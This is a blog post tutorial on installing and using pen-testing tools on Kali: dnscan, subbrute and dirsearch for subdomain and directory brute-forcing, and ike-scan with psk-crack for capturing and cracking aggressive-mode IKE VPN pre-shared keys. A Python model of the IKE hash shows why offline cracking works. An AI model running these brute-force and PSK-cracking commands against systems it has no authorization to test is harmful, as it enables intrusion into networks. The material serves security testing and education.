Saturday, October 20, 2018

List of recommended tools to install on Kali before pen-testing


Dnscan - A Python tool that uses a wordlist to resolve valid subdomains.

How to install Dnscan

1. Open the Terminal and type in 

git clone https://github.com/rbsec/dnscan.git and press Enter

2. In the Terminal, navigate to the directory where you downloaded the Dnscan tool then type in ./dnscan.py -h and press Enter

Now you will be able to see a screen like the one I have below.



Subbrute - This tool provides an extra layer of anonymity, as it uses public resolvers to brute-force the subdomains.

How to install Subbrute

1. Open the Terminal and type in 

git clone https://github.com/TheRook/subbrute.git and press Enter

Once the installation is complete you will need to have a dictionary wordlist to run it against a domain. You can either download a list at https://github.com/bitquark/dnspop/tree/master/results OR you can use Crunch which came with Kali to generate your own wordlist.

2. Once you have both Subbrute installed and a wordlist you can run the following command to brute-force a domain

./subbrute.py -s /path/to/wordlist domain.com

Dirsearch - This tool can be used to brute-force a directory and it is much faster than DIRB. 

How to install Dirsearch

1. Open the Terminal and type in

git clone https://github.com/maurosoria/dirsearch.git

2. Once the cloning is completed browse to the directory and run the tool using the following command

./dirsearch.py -u domain.com -e aspx,php

Below is an example of a screenshot after running Dirsearch



ike-scan - For attacking VPN

Sometimes when we attack a system or network we encounter VPN endpoints. However, finding vulnerabilities in those endpoints and exploiting them is a less well-known technique. VPN endpoints use IKE, the Internet Key Exchange protocol, to set up a security association between the two peers of a VPN tunnel.

IKE has two phases. Phase one sets up and authenticates a secure communication channel between the peers, and phase two negotiates the keys used to encrypt and transport the data.

Our focus here is phase one, which can run in one of two modes for exchanging keys: Main mode or Aggressive mode.

We will hunt for aggressive mode enabled VPN endpoints using PSK authentication. 

To Install ike-scan

1. Open the Terminal and type in

git clone https://github.com/royhills/ike-scan.git

2. Browse to the directory where ike-scan was downloaded and type in apt-get install autoconf

3. Now type in autoreconf --install and press Enter to generate a configure file.

4. Type in ./configure and press Enter

5. Now type in make and press Enter to build the project

6. Run make check to verify the build

7. Run make install to install ike-scan

8. To scan a host for an aggressive mode handshake, type in the command below. 

ike-scan 192.168.1.1 -M -A and press Enter

After running the command above you will be able to see a screen like the one I have below.


9. Sometimes the endpoint only responds once a valid group name (for example, vpn) is supplied with the --id option:

ike-scan 192.168.1.1 -M -A --id=vpn

For additional help on how to use ike-scan you can also execute the command ike-scan -h

NOTE: You can also brute-force the group names by using the script below

1. https://github.com/SpiderLabs/groupenum

2. ./dt_group_enum.sh 192.168.1.2 groupnames.dic


Cracking the PSK

1. ike-scan 192.168.1.1 -M -A --id=vpn -P

Where -P is the option that tells ike-scan to display the captured hash, together with the exchange parameters needed to crack it, in the response.

2. To save the hash we attach a filename directly to the -P flag (no space between -P and the path) and then run psk-crack against that file, like below.

ike-scan 192.168.1.1 -M -A --id=vpn -P/path/to/pskkey

psk-crack -b 5 /path/to/pskkey

Where -b is brute-force mode and 5 is the maximum length of the password

3. To use a dictionary based attack we can use the following command

psk-crack -d /path/to/dictionary /path/to/pskkey

How does it work?

In aggressive mode, the responder's authentication hash is sent back in cleartext in reply to the packet of the VPN client that is trying to establish the IPsec tunnel. Because that hash is not encrypted, anyone who captures the exchange can run an offline brute-force or dictionary attack against it to recover the PSK. This is not possible in main mode, which sends the hash only after the channel has been encrypted and uses a six-way handshake, whereas aggressive mode completes in a three-way handshake.
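As an added example (not from the original post), the Python below models the RFC 2409 pre-shared-key authentication that ike-scan and psk-crack rely on, to show why a hash captured from an aggressive-mode exchange is enough to test a PSK guess offline, while the same observer learns nothing from main mode. All exchange values are constructed (random nonces, DH values and cookies, a stub SA body, an ID_IPV4_ADDR of 192.168.1.1) and the prf is assumed to be HMAC-SHA1, i.e. an SHA-1 hash transform.

```python
import hashlib
import hmac
import os

def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf with the SHA-1 hash transform: HMAC-SHA1 (assumption)."""
    return hmac.new(key, data, hashlib.sha1).digest()

def hash_r(psk: bytes, ex: dict) -> bytes:
    """Responder authentication hash for pre-shared-key auth (RFC 2409, 5.4):
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)"""
    skeyid = prf(psk, ex["ni"] + ex["nr"])
    return prf(skeyid, ex["g_xr"] + ex["g_xi"] + ex["cky_r"] + ex["cky_i"]
               + ex["sai_b"] + ex["idir_b"])

def aggressive_mode_capture(psk: bytes) -> dict:
    """What a passive observer collects from an aggressive-mode phase 1.
    Every input to HASH_R, and HASH_R itself, travels unencrypted in the
    three-message exchange. Values are constructed, not a real capture."""
    ex = {
        "ni": os.urandom(20), "nr": os.urandom(20),        # nonces
        "g_xi": os.urandom(128), "g_xr": os.urandom(128),  # DH public values
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),    # ISAKMP cookies
        "sai_b": bytes.fromhex("0000000100000001"),        # initiator SA body (stub)
        "idir_b": bytes([1, 0, 0, 0]) + bytes([192, 168, 1, 1]),  # ID_IPV4_ADDR
    }
    ex["hash_r"] = hash_r(psk, ex)  # the gateway sends this in the clear
    return ex

def psk_verifies(ex: dict, candidate: bytes) -> bool:
    """The offline check the capture enables: recompute HASH_R under a guessed
    PSK and compare. No further packets to the gateway are needed, which is
    why a weak PSK on an aggressive-mode endpoint is recoverable. In main
    mode HASH_R is carried only inside the already-encrypted sixth message,
    so the same capture gives an observer nothing to test a guess against;
    the fix on the gateway side is to not offer aggressive mode with PSK."""
    return hmac.compare_digest(hash_r(candidate, ex), ex["hash_r"])

GATEWAY_PSK = b"constructed-demo-psk"  # stands in for the gateway's configured PSK

if __name__ == "__main__":
    cap = aggressive_mode_capture(GATEWAY_PSK)
    print("HASH_R seen on the wire:", cap["hash_r"].hex())
    print("right PSK verifies:", psk_verifies(cap, GATEWAY_PSK))
    print("wrong PSK verifies:", psk_verifies(cap, b"not-the-psk"))
```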
